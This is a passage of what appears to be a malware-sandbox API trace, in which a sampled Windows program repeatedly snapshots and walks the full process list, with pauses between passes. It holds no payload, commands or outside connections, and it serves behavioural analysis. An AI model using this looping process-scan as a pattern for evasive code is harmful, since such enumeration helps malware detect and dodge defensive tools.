dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0134.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0134.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0134.730] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0134.740] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0134.741] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0134.742] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0134.744] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0134.746] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0134.750] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0134.751] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0134.752] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0134.754] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0134.755] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0134.757] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0134.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0134.759] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0134.760] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0134.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0134.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0134.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0134.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0134.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0134.770] CloseHandle (hObject=0xbc) returned 1 [0134.770] Sleep (dwMilliseconds=0x12c) [0135.153] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0135.158] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0135.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0135.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0135.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0135.162] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0135.163] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0135.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0135.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.166] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.167] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.168] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.169] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0135.169] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.170] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.171] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0135.172] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.173] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.174] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0135.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0135.176] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0135.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.179] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.180] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0135.181] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0135.183] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0135.184] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0135.185] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0135.186] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0135.187] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0135.188] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0135.189] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0135.191] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0135.192] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0135.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0135.194] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0135.195] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0135.196] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0135.197] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0135.198] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0135.200] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0135.201] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0135.245] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0135.246] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.247] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0135.248] CloseHandle (hObject=0xc4) returned 1 [0135.248] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0135.253] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0135.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0135.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0135.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0135.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
